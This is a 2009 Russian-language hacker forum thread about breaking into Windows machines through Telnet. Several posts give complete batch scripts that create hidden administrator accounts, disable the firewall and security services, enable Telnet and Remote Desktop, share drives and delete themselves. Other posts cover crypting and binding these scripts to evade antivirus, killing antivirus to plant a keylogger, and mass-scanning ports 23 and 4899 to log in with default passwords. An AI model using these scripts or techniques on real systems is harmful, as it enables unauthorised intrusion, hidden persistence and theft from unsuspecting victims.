RE: Взлом через Telnet
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Взлом через Telnet - 2009-04-03 23:01:22.090000
|
|
|
Duhas
Сообщений: 125
Оценки: 0
Присоединился: 2009-03-12 16:33:18.890000
|
quote:
ORIGINAL: Matios А можешь дать нормальный исходник, чтобы точно знать, что прокатит? просто больше шансов на передачу не будит(( Нашел такое. в сети проканало на ура! Проверил, и на внешке тоже катит на ура!!!
@echo off
Chcp 1251
net user Админ 1234 /add > nul
net localgroup Администраторы Админ /add > nul
net localgroup "Пользователи удаленного рабочего стола" Админ /add > nul
cd %systemroot%
@echo Windows Registry Editor Version 5.00 > tmp.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> tmp.reg
@echo "Админ"=dword:00000000 >> tmp.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >> tmp.reg
@echo "forceguest"=dword:00000000 >> tmp.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> tmp.reg
@echo "fAllowToGetHelp"=dword:00000000 >> tmp.reg
@echo "fDenyTSConnections"=dword:00000000 >> tmp.reg
regedit /s %SystemRoot%\tmp.reg /y
sc stop wscsvc > nul
sc stop SharedAccess > nul
sc config wscsvc start= disabled > nul
sc config SharedAccess start= disabled > nul
sc config tlntsvr start= auto > nul
sc config termservice start= auto > nul
sc start tlntsvr > nul
sc start termservice > nul
cd %systemroot%
del tmp.reg
net share disk_c=c: > nul
net share disk_d=d: > nul
del %0
Ты взял в тупую собрал кучу батников в кучу и что получил в итоге?!
|
|
|
RE: Взлом через Telnet - 2009-04-07 18:56:34.410000
|
|
|
griffis
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-07 02:26:14.236666
|
Возник вопрос допустим мы на компе жертвы и вошли под учеткой какую мы создали. Тут писали что типа она видна при перезагрузке. А если попробовать пока жертва не перезагрузилась стырить у нее SAM, потом стереть нашу палевную учетку и сидеть уже под пользователем жертвы?? + еше можно попробовать переименовать процесс tlntsrv на какойнибуть другой??
|
|
|
RE: Взлом через Telnet - 2009-04-07 22:21:58.343333
|
|
|
Duhas
Сообщений: 125
Оценки: 0
Присоединился: 2009-03-12 16:33:18.890000
|
Проще это все дело в автозагрузку прописать после залить файлы Radmin'a и сидеть себе как королю…:)
|
|
|
RE: Взлом через Telnet - 2009-04-07 22:45:30.343333
|
|
|
griffis
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-07 02:26:14.236666
|
не палевно ли будет что процесс радмина запущен будет??
|
|
|
RE: Взлом через Telnet - 2009-04-08 11:13:19.253333
|
|
|
griffis
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-07 02:26:14.236666
|
Покапался в инете и нашел во такую фишку "netsh firewall add portopening" открытие пора в брандмауэре как думаете норм будет если батник вот такой с учетом того что на компе жертвы не установлено другого антивир ПО кроме стандартного виндосвкого chcp 1251 net user 1 123456 /add net localgroup Администраторы 1 /add netsh firewall add portopening TCP 972 System sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet
|
|
|
RE: Взлом через Telnet - 2009-04-08 13:53:46.750000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Парни,как мне прописать batник в автозагрузку…
|
|
|
RE: Взлом через Telnet - 2009-04-08 15:02:02.530000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
griffis,спс[sm=az.gif]
|
|
|
RE: Взлом через Telnet - 2009-04-08 18:34:31.410000
|
|
|
GreatFish
Сообщений: 23
Оценки: 0
Присоединился: 2009-04-06 02:53:03.413333
|
Что значит,когда входишь по телнету,появляется строка router> Что это???????????? Точнее что с этим можно сделати,и каким образом??????
|
|
|
RE: Взлом через Telnet - 2009-04-08 19:07:21.403333
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Подскажите,когда я спёр пароли от ADSL интернета что мне с ними делать…
|
|
|
RE: Взлом через Telnet - 2009-04-08 20:23:51.660000
|
|
|
Rаlf
Сообщений: 408
Оценки: 0
Присоединился: 2008-01-31 23:20:28.036666
|
quote:
ORIGINAL: tohack Подскажите,когда я спёр пароли от ADSL интернета что мне с ними делать… 1. Подумать, зачем ты это здел. 2. Вспомнить об ответственности в УК. 3. Оценить шансы тебя вычислить 4. Использовать для доступа в интернет через ADSL.
|
|
|
RE: Взлом через Telnet - 2009-04-08 23:46:11.823333
|
|
|
griffis
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-07 02:26:14.236666
|
quote:
Что значит,когда входишь по телнету,появляется строка router> Что это???????????? Точнее что с этим можно сделати,и каким образом?????? ну думаю ты попал в роутер =) тут глянь может поможет http://ru.wikibooks.org/wiki/%D0%9F%D0%BE%D1%80%D1%82/Router
|
|
|
RE: Взлом через Telnet - 2009-04-09 01:07:15.373333
|
|
|
GreatFish
Сообщений: 23
Оценки: 0
Присоединился: 2009-04-06 02:53:03.413333
|
quote:
ORIGINAL: griffis quote:
Что значит,когда входишь по телнету,появляется строка router> Что это???????????? Точнее что с этим можно сделати,и каким образом?????? ну думаю ты попал в роутер =) тут глянь может поможет http://ru.wikibooks.org/wiki/%D0%9F%D0%BE%D1%80%D1%82/Router Спасибо,но не то.Общий принцип я знаю.Не могу найти описаний команд Роутера(модема) например: sys etherdbg dot1q lan exit usb pktqos ether ip show wan bridge set Они выходят в стандартном хэлпе. Проверил sys появились : adjtime domainname hostname time syslog romrest diag display modelcheck cpu и другие,все не переписал.Если у кого нибудь есть,или знает ссылку,был бы очень благодарен.Желательно полное описание всех команд,с синтаксисом.С роутерами не связывался,много незнакомого.А в слепую тыкатся не серьёзно.
|
|
|
RE: Взлом через Telnet - 2009-04-09 01:55:29.206666
|
|
|
krik
Сообщений: 86
Оценки: 0
Присоединился: 2008-01-11 23:03:04.066666
|
Такая проблема есть: Нашёл через поука ИП с открытыми портами, как узнать логин и пасс от телнета??? при заходи через телнет пишет: welcome to mutant200s mutant200s login:
|
|
|
RE: Взлом через Telnet - 2009-04-09 02:17:07.540000
|
|
|
GreatFish
Сообщений: 23
Оценки: 0
Присоединился: 2009-04-06 02:53:03.413333
|
quote:
ORIGINAL: krik Такая проблема есть: Нашёл через поука ИП с открытыми портами, как узнать логин и пасс от телнета??? при заходи через телнет пишет: welcome to mutant200s mutant200s login: В телнете лимит подключений,брутить неудобно.Пробуй самые распространённые.Это если тебе именно этот IP и и обязательно через телнет. Если с ОТКРЫТЫМИ ПОРТАМИ попробуй через другие войти.Radmin,Desktop,FTP и прочее. А вообще по Российским сетям с этим можно и не мучится,берёшь диапазон какой нибудь сетки,сканишь на 23 порт,и открываешь.Если просят логин,то в помойку,если только пасс то вбиваешь 1234 или 12345. Более 50 процентов,у кого только пас требуется,и подходит стандартный.
|
|
|
RE: Взлом через Telnet - 2009-04-09 03:28:36.406666
|
|
|
krik
Сообщений: 86
Оценки: 0
Присоединился: 2008-01-11 23:03:04.066666
|
спс за идею сканить только 23 порт:) П.С. уже 1 телнет акк нашёл + на этом же ип фтп акк:)
|
|
|
RE: Взлом через Telnet - 2009-04-09 12:48:15.660000
|
|
|
VIRUSTAM
Сообщений: 5
Оценки: 0
Присоединился: 2009-03-26 23:25:37.340000
|
Dobrii den uvojaemie Forumci! Ya vse vrode bi sdelal no u mena nichego nepoluchilos! Pomogite mne pojalusta! Naprimer u mena neskolko PC: Est Vita, Xp, 2000 i Server 2003 - 2008. Ya znayu ihnie IP, Gatway, DNS, Maske. Ya hochu cherez Vistu na eti kompi zahodit cherez inet vse ostalnie toje podklucheni k inetu. Kak mne dat link ili chto nado sdelat na etix kompax chtob ya mog zahodit cherez telnet k nim. Znayu takuyu progu kak SecureCRT esli nujno chto to drugoe podskajite pojalusta. I eshe u mena odin vopros? Kak uznovat port. Gde i kakaya funkciya chtobi uznat port PC Budu ochen rad! Spasibo vam bolshoe!
|
|
|
RE: Взлом через Telnet - 2009-04-09 17:50:01.710000
|
|
|
GreatFish
Сообщений: 23
Оценки: 0
Присоединился: 2009-04-06 02:53:03.413333
|
quote:
ORIGINAL: krik спс за идею сканить только 23 порт:) П.С. уже 1 телнет акк нашёл + на этом же ип фтп акк:) Скань лучше 2 хотя бы.23 и 4899.Radmin тоже не редко встречается по дефолту,если тебе очень компы нужны.В принципе,когда очень надо,сканю по ним,за час набирается около 10 по радмину,и штук 20-25 по телнету,если грамотно диапазончик выбирать.
|
|
|
RE: Взлом через Telnet - 2009-04-23 16:43:36.030000
|
|
|
ka4a
Сообщений: 10
Оценки: 0
Присоединился: 2009-02-24 03:18:51.940000
|
телнет очень сильная штука и не чем не палится. но умный знает что у него запущено
|
|
|
RE: Взлом через Telnet - 2009-04-24 21:06:55.066666
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
Вот этот прокатил батник chcp 1251 REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 123 /t REG_SZ /d D:\123.vbs /f start "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\123" D:\123.vbs net user 123 191111 /add net localgroup Администраторы 123 /add net localgroup Administrators 123 /add REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "123" /t REG_DWORD /d 0 /f net stop sharedaccess sc config sharedaccess start= disabled sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet Но хотелось бы Подключение к удаленному рабочему столу сделать Попробывал chcp 1251 net user cool 191111 /add net localgroup Администраторы 1234 /add net localgroup Пользователи удаленного рабочего стола 1234 /add net accounts /maxpwage:unlimited net stop sharedaccess sc config sharedaccess start= disabled Чет не пашет, в чем проблемма? Как правельно надо сделать?
|
|
|
RE: Взлом через Telnet - 2009-04-30 21:37:38.773333
|
|
|
NitroM$I
Сообщений: 1
Оценки: 0
Присоединился: 2009-04-30 21:22:32.746666
|
барон сука стучи гнида в асю! 8116328
|
|
|
RE: Взлом через Telnet - 2009-06-03 05:40:52.423333
|
|
|
XANer
Сообщений: 114
Оценки: 0
Присоединился: 2009-05-25 01:04:23.160000
|
ЭЭЭ народ подскажите прогу что бы ломать можна было=))
|
|
|
RE: Взлом через Telnet - 2009-06-06 09:49:28.960000
|
|
|
SkyNet91
Сообщений: 5
Оценки: 0
Присоединился: 2009-06-06 09:32:07.570000
|
Всем привет у меня такой вопрос я запустил телнет подключился к другому компу и тут спрашивает логин и пароль логин я ввел и пароль не водиться что делать подскажите кто может
|
|
|
RE: Взлом через Telnet - 2009-06-06 21:00:51.580000
|
|
|
krik
Сообщений: 86
Оценки: 0
Присоединился: 2008-01-11 23:03:04.066666
|
пасс вводиться, но неотображается просто из з абезопасности
|
|
|
RE: Взлом через Telnet - 2009-06-10 05:34:57.320000
|
|
|
XANer
Сообщений: 114
Оценки: 0
Присоединился: 2009-05-25 01:04:23.160000
|
ЭЭ people, can u say me wat kind of program do I need to breake telnet???
|
|
|
RE: Взлом через Telnet - 2009-06-16 16:46:15.510000
|
|
|
Razorich
Сообщений: 5
Оценки: 0
Присоединился: 2009-06-15 22:51:52.910000
|
Народ нужна помощь, такая трабла: внедрил в систему недруга батник (слил с другим файлом и закриптовал как-то О_о) всё идеально работало успел накачать инфы всякой, только вот он засёк админ. запись hacker и скорее всего удалил, порт 972 открыт, можно ли как-нибудь выбить пользователя и пароль его компа? Хотя бы имя [&o]
|
|
|
RE: Взлом через Telnet - 2009-06-16 22:06:51.683333
|
|
|
Razorich
Сообщений: 5
Оценки: 0
Присоединился: 2009-06-15 22:51:52.910000
|
Хм… странная тенденция, криптованный скомпиленный батник (криптовал pohernah) обнаружается в 37,5% случаев (24 антивируса тестило), а не криптованный в 25%. 8| Инфа криптованного: File Info Report generated: 16.6.2009 at 20.00.53 (GMT 1) Filename: crush.exe File size: 64 KB MD5 Hash: 3F2D697BC884403078F4E4BE574FFBBE SHA1 Hash: 2B922DFBDE67FC70E7FE049639785C6D8E8C99BC Packer detected: Nothing found * Self-Extract Archive: Nothing found Binder Detector: Nothing found Detection rate: 9 on 24 Detections a-squared - Nothing found! Avira AntiVir - TR/Dropper.Gen Avast - Nothing found! AVG - Win32/PolyCrypt BitDefender - Packer.Pohernah.D ClamAV - Nothing found! Comodo - Heur.Packed.Unknown Dr.Web - Trojan.Packed.454 Ewido - Nothing found! F-PROT 6 - Nothing found! G DATA - Nothing found! IkarusT3 - Nothing found! Kaspersky - SuspiciousPacker.Multi.Generic McAfee - Nothing found! MHR (Malware Hash Registry) - Nothing found! NOD32 v3 - Nothing found! Norman - Nothing found! Panda - Nothing found! Quick Heal - Suspicious Solo Antivirus - Nothing found! Sophos - Nothing found! TrendMicro - Nothing found! VBA32 - Malware-Cryptor.Win32.Vserafno Virus Buster - Packed/Pohernah Scan report generated by NoVirusThanks.org
|
|
|
RE: Взлом через Telnet - 2009-06-20 07:03:06.150000
|
|
|
XANer
Сообщений: 114
Оценки: 0
Присоединился: 2009-05-25 01:04:23.160000
|
Значит криптовать нада 25 раз =)) если возможно, хотя воврядле
|
|
|
RE: Взлом через Telnet - 2009-07-31 23:07:38.790000
|
|
|
chenivi
Сообщений: 6
Оценки: 0
Присоединился: 2009-07-30 16:27:15.870000
|
вот тело батника @echo off Chcp 1251 net user Админ 1234 /add > nul net localgroup Администраторы Админ /add > nul net localgroup "Пользователи удаленного рабочего стола" Админ /add > nul cd %systemroot% @echo Windows Registry Editor Version 5.00 > tmp.reg @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> tmp.reg @echo "Админ"=dword:00000000 >> tmp.reg @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >> tmp.reg @echo "forceguest"=dword:00000000 >> tmp.reg @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> tmp.reg @echo "fAllowToGetHelp"=dword:00000000 >> tmp.reg @echo "fDenyTSConnections"=dword:00000000 >> tmp.reg regedit /s %SystemRoot%\tmp.reg /y sc stop wscsvc > nul sc stop SharedAccess > nul sc config wscsvc start= disabled > nul sc config SharedAccess start= disabled > nul sc config tlntsvr start= auto > nul sc config termservice start= auto > nul sc start tlntsvr > nul sc start termservice > nul cd %systemroot% del tmp.reg net share disk_c=c: > nul net share disk_d=d: > nul del %0 когда запускаю его всё работает. а если склеиваеш с каким нибуть файлом он не работает подскажите в чом причина
|
|
|
RE: Взлом через Telnet - 2009-08-27 17:51:38.070000
|
|
|
Different
Сообщений: 4
Оценки: 0
Присоединился: 2009-08-25 19:03:50.083333
|
Привет всем, кто меня не знает. Для запуска Telnet'a, требуется, что б были активные службы: Драйвер протокола TCP/IP –> Драйвер IPSEC; Поставщик поддержки безопасности NT LM, и УдалённЙы вызов процедур (RPC). Иначе выпадет сообщение типа: "Не удалось запустить… Error 1068." В Посте №1 Telnet ставится в автозапуск командой "sc config tlntsvr start= auto". Как запустить две другие через консоль(.bat). Пробовал запустить NT LM(Lsass.exe) командой sc config lsass start= auto, в ответ получил плюху, типа [SC] OpenService FAILED 1060: Кто знает в чём проблема? Всё таки интересТно. И еще, поексперементируйте с ситемной консолью(Консоль от SYSTEM) на счет убийств антивирей. Вызывается она командой <at 16:41 /interactive "cmd"> вместо 16:41 поставте ваше время+ 1мин.;)
|
|
|
RE: Взлом через Telnet - 2009-09-06 20:45:38.863333
|
|
|
ro5co
Сообщений: 1
Оценки: 0
Присоединился: 2009-09-06 16:07:58.660000
|
На windows 7 есть поддержка telnet? По стандартному адресу "c:WINDOWS\system32\telnet.exe" не обнаружил.
|
|
|
RE: Взлом через Telnet - 2009-10-08 22:27:56.286666
|
|
|
DIMONLE
Сообщений: 24
Оценки: 0
Присоединился: 2008-10-14 20:41:17.220000
|
тоже самое,хотел качнуть файл на чела,но нифига,опытные опишите плз по бырому как залить файл через telnet)
|
|
|
RE: Взлом через Telnet - 2009-10-24 10:57:02.193333
|
|
|
Morsik!
Сообщений: 150
Оценки: 0
Присоединился: 2009-10-18 14:56:06.430000
|
у меня вопрос а можно отрубить процес компа через телнет? просто мне надо отключить процессы касперского и dr.web а после удалить их) а потом я собираюсь кинуть туда кейлогер через радмин вот такой я злодей):D
|
|
|
RE: Взлом через Telnet - 2009-10-25 09:41:53.610000
|
|
|
Erika1978
Сообщений: 28
Оценки: 0
Присоединился: 2009-03-07 09:54:10.870000
|
У меня что-то не так получилось,при вводе логина,логин вводится,а при вводе пасса ничего не могу ввести.черточка мигает.но не на одну клавишу не откликается.В чем дело-то?
|
|
|
RE: Взлом через Telnet - 2009-10-25 15:54:08.640000
|
|
|
scsi.aka.api
Сообщений: 122
Оценки: 0
Присоединился: 2008-07-02 00:58:06.646666
|
есть telnet доступ к деду,но проблема в том что там стоит китайский server 2003 и вот такой bat вылетает с ошибкой chcp 1251 net user SUPPORT_388945a0 /delete net user brtn 123 /add net localgroup Администраторы brtn /add net localgroup Administrators brtn /add net localgroup Пользователи SUPPORT_388945a0 /del REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "brtn" /t REG_DWORD /d 0 /f кто-нибудь знает как создать там новую учётную запись в правами администратора?
|
|
|
RE: Взлом через Telnet - 2009-10-30 21:16:29.650000
|
|
|
Morsik!
Сообщений: 150
Оценки: 0
Присоединился: 2009-10-18 14:56:06.430000
|
quote:
все доброе время суток !! помогите пожалуйста… мне нужна команда для батника чтобы завершала процесс касперыча ну и для других антивирусов тоже не помешает… спасибо всем кто откликнется на мою просьбу… ну касперский и доктор веб не палит как вир, скомпилированный батник кидал знакомой ,у нее не палил ,а вот у меня аваст ,он мне компилировать не давал приходилось останавливать и компилировать на счет нод 32 незнаю но вроде он 1 и палит,так что если там 1 из этих антивиров не бойся они не спалят и сейчас я проверил авастом он как молчал так и молчит в тряпку)
|
|
|
RE: Взлом через Telnet - 2009-11-23 13:50:58.566666
|
|
|
nub Nik
Сообщений: 263
Оценки: 0
Присоединился: 2009-11-18 10:53:00.250000
|
Текст был тут взят: http://www.fssr.ru/hz.php?name=News&file=article&sid=8820 Я уже 2 раз вижу как его от туда копируют, и выдают за свое!
|
|
|
RE: Взлом через Telnet - 2009-12-13 18:55:50.876666
|
|
|
Xaklog
Сообщений: 12
Оценки: 0
Присоединился: 2009-11-12 10:23:38.660000
|
Ребята подскажите команду чтобы кароче ip адрес чтобы узнать!!!
|
|
|
RE: Взлом через Telnet - 2009-12-15 11:22:57.640000
|
|
|
manool
Сообщений: 4
Оценки: 0
Присоединился: 2009-12-14 14:17:46.050000
|
всё хорошо идет ввожу логин жму Enter пишет pass ввожу пароль а ниче не набирается
|
|
|
|
|